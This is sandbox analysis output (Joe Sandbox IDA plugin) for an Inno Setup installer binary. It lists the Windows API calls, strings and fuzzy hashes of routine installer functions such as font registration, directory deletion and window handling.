Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A18830$A122A26310A570Focus
String ID: {H
API String ID: 3906783838-1783425356
Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9

Function 0041B94C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041BA27
73A1A570.USER32(?), ref: 0041BA33
73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1

Strings

{H, xrefs: 0041B954

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A18830$A122A26310A570Focus
String ID: {H
API String ID: 3906783838-1783425356
Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4

Function 00476888 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004767B0: GetWindowThreadProcessId.USER32(?), ref: 004767B8
Part of subcall function 004767B0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,?,?,?,004768AF,0049B050,00000000), ref: 004767CB
Part of subcall function 004767B0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1

SendMessageA.USER32(?,0000004A,00000000,BlG), ref: 004768BD
GetTickCount.KERNEL32 ref: 00476902
GetTickCount.KERNEL32 ref: 0047690C
MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00476961

Strings

CallSpawnServer: Unexpected status: %d, xrefs: 0047694A
CallSpawnServer: Unexpected response: $%x, xrefs: 004768F2
BlG, xrefs: 004768AF, 004768B2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: BlG$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 613034392-3388943489
Opcode ID: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
Instruction ID: df859dff2162c270e2d7d1c5060a18d5d2758608ab9b0db3860dd5af44bb5bd3
Opcode Fuzzy Hash: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
Instruction Fuzzy Hash: F531C4B4F006159ADB10EBB988427EEB6A59F04304F51843BF548FB382D67D4D008BAD

Function 00494B54 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

GetWindowThreadProcessId.USER32(?,?), ref: 00494BE5
OpenProcess.KERNEL32(00100000,00000000,?,?,?), ref: 00494BF9
SendNotifyMessageA.USER32(?,0000054D,00000000,00000000), ref: 00494C13
WaitForSingleObject.KERNEL32(00000000,000000FF,?,0000054D,00000000,00000000,?,?), ref: 00494C1F
CloseHandle.KERNEL32(00000000,00000000,000000FF,?,0000054D,00000000,00000000,?,?), ref: 00494C25
Sleep.KERNEL32(000001F4,?,0000054D,00000000,00000000,?,?), ref: 00494C38

Strings

Deleting Uninstall data files., xrefs: 00494B5B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: 39941d13c672f3b0981f30f960303aeba8df84b9d5b08650226e1e0d8e5920eb
Instruction ID: e1fcdc77d6d78d50d68a388ab1430eaee9cd4602355dadba40cd1fe6c0376bc1
Opcode Fuzzy Hash: 39941d13c672f3b0981f30f960303aeba8df84b9d5b08650226e1e0d8e5920eb
Instruction Fuzzy Hash: 1321A270314204AEEB10AB76FD86F1737A8EB9871CF11403BB5049A2E3D67C9C059B6D

Function 0046F344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441,?,?,?,?,00000000), ref: 0046F3AB
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441), ref: 0046F3C2
AddFontResourceA.GDI32(00000000), ref: 0046F3DF
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F3F3

Strings

AddFontResource, xrefs: 0046F3FD
Failed to set value in Fonts registry key., xrefs: 0046F3B4
Failed to open Fonts registry key., xrefs: 0046F3C9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 7caf28e263edb8a34ebe0d54c5ecfbeed76f56fb8ecfa80082da23dbeb2d7a98
Instruction ID: f1b7769b30759bd79ce57191d192b4d330d9cf52c64851f68664acd4af899289
Opcode Fuzzy Hash: 7caf28e263edb8a34ebe0d54c5ecfbeed76f56fb8ecfa80082da23dbeb2d7a98
Instruction Fuzzy Hash: 5C21B5707442047BDB10EAA6AC42B5F779CDB55708F504077B940EB3C2EA7CDD09966E

Function 00462658 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE

GetVersion.KERNEL32 ref: 00462688
SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004626C6
SHGetFileInfo.SHELL32(00462764,00000000,?,00000160,00004011), ref: 004626E3
LoadCursorA.USER32(00000000,00007F02), ref: 00462701
SetCursor.USER32(00000000,00000000,00007F02,00462764,00000000,?,00000160,00004011), ref: 00462707
SetCursor.USER32(?,00462747,00007F02,00462764,00000000,?,00000160,00004011), ref: 0046273A

Strings

Explorer, xrefs: 004626A2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
Opcode ID: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
Instruction ID: 6a4e252a28e1308c719c9726d886bca0e07c323248169c17b4ee411155371309
Opcode Fuzzy Hash: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
Instruction Fuzzy Hash: 4E21E7707407047AE714BB798D47F9B76989B08708F5040BFB605EA1D3DABC8C1486AE

Function 00476F8C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?), ref: 00476FE8
CloseHandle.KERNEL32(00000000,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006

Strings

GetFinalPathNameByHandleA, xrefs: 00476F9B
kernel32.dll, xrefs: 00476FA0

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: 9f6490b6d9c6ef14c82f1279d9fdf40ac51f91d9869cb7e3acec2c6452924dcb
Instruction ID: 04a5afe5644114c9e654b58a063851b3298de4fad75a38fc97de6a0c2b4846ec
Opcode Fuzzy Hash: 9f6490b6d9c6ef14c82f1279d9fdf40ac51f91d9869cb7e3acec2c6452924dcb
Instruction Fuzzy Hash: F0012242744B843AE52031BA4C82FFB604C8B40769F658137BB0CEA2C2E9AD9C06016E

Function 0045962C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004597AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 004596F2

Part of subcall function 00453920: FindClose.KERNEL32(000000FF,00453A16), ref: 00453A05

Strings

Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004596CC
Stripped read-only attribute., xrefs: 004596B4
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459767
Deleting directory: %s, xrefs: 0045967B
Failed to delete directory (%d). Will retry later., xrefs: 0045970B
Failed to delete directory (%d)., xrefs: 00459788
Failed to strip read-only attribute., xrefs: 004596C0

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 9fd7c86adb96231b7ed00b8331b10676a4a89bf96eb4e47f33b82bee1f394d42
Instruction ID: a86c8ab60afa317b509f53e9f989c8e764947ac742467407c0eea8b2d16f96ba
Opcode Fuzzy Hash: 9fd7c86adb96231b7ed00b8331b10676a4a89bf96eb4e47f33b82bee1f394d42
Instruction Fuzzy Hash: B1418330A14205DBCB10EFA988012AE76E5AF4D31AF54857FBC1597393DB7C8D0D8759

Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00422EB4
GetCapture.USER32 ref: 00422EC3
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
ReleaseCapture.USER32 ref: 00422ECE
GetActiveWindow.USER32 ref: 00422EDD
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
GetActiveWindow.USER32 ref: 00422FCF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
Opcode Fuzzy Hash: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D

Function 0042F104 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(0001041A,000000F0), ref: 0042F12E
GetWindowLongA.USER32(0001041A,000000EC), ref: 0042F145
GetActiveWindow.USER32 ref: 0042F14E
MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ActiveLong$Message
String ID:
API String ID: 2785966331-0
Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68

Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000), ref: 0042949A
GetTextMetricsA.GDI32(00000000), ref: 004294A3

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 004294B2
GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
SelectObject.GDI32(00000000,00000000), ref: 004294C6
73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
GetSystemMetrics.USER32(00000006), ref: 004294F3
GetSystemMetrics.USER32(00000006), ref: 0042950D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
String ID:
API String ID: 361401722-0
Opcode ID: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
Opcode Fuzzy Hash: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A

Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 59windowCOMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,00419069,004972A6), ref: 0041DE37
73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE41
73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE4E
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
GetStockObject.GDI32(00000007), ref: 0041DE6B
GetStockObject.GDI32(00000005), ref: 0041DE77
GetStockObject.GDI32(0000000D), ref: 0041DE83
LoadIconA.USER32(00000000,00007F00), ref: 0041DE94

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ObjectStock$A24620A480A570IconLoad
String ID:
API String ID: 3573811560-0
Opcode ID: 4470e331ca51f0b74f516ae5b6f44e36db521ff283fca0247bca4cd8b114a647
Instruction ID: fd5f53b4d57f986c1b5a10b7f47afaa2e43aebf4e7d3cf903f26461dc314f973
Opcode Fuzzy Hash: 4470e331ca51f0b74f516ae5b6f44e36db521ff283fca0247bca4cd8b114a647
Instruction Fuzzy Hash: 6B113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DA7D1C949BAE

Function 00462A68 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 00462B6C
SetCursor.USER32(00000000,00000000,00007F02,00000000,00462C01), ref: 00462B72
SetCursor.USER32(?,00462BE9,00007F02,00000000,00462C01), ref: 00462BDC

Strings

, xrefs: 00462E02
Internal error: Item already expanding, xrefs: 00462B09
, xrefs: 00462DE7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
Instruction ID: 311ca96f077e1f8384384c33a5c3f76c8765359b8b10716ccdf0848656b08f70
Opcode Fuzzy Hash: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
Instruction Fuzzy Hash: 4EB19030600A04EFD710DF69C685B9ABBF1FF44304F1484AAE8459B792E7B8ED45CB5A

Function 0047586C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004758C5
73A259E0.USER32(00000000,000000FC,00475820,00000000,00475B04,?,00000000,00475B2E), ref: 004758EC
GetACP.KERNEL32(00000000,00475B04,?,00000000,00475B2E), ref: 00475929
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0047596F

Strings

COMBOBOX, xrefs: 004758BE
Inno Setup: Language, xrefs: 004759F7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A259ClassInfoMessageSend
String ID: COMBOBOX$Inno Setup: Language
API String ID: 3217714596-4234151509
Opcode ID: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
Instruction ID: e49daa43e03c71068c6435758e3380e7ad7aa0efbc45612d2d59fcec593b4e77
Opcode Fuzzy Hash: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
Instruction Fuzzy Hash: 2E814C34600609DFCB10DF69D985AAEB7F0FB09314F1481BAE809EB362D774AD01CB98

Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF

Strings

AMPM, xrefs: 0040890D
m/d/yy, xrefs: 00408811
:mm:ss, xrefs: 0040893E
mmmm d, yyyy, xrefs: 00408833
:mm, xrefs: 00408924

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E

Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A

Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6

Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD

Strings

?, xrefs: 004117B6
,, xrefs: 004117AF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
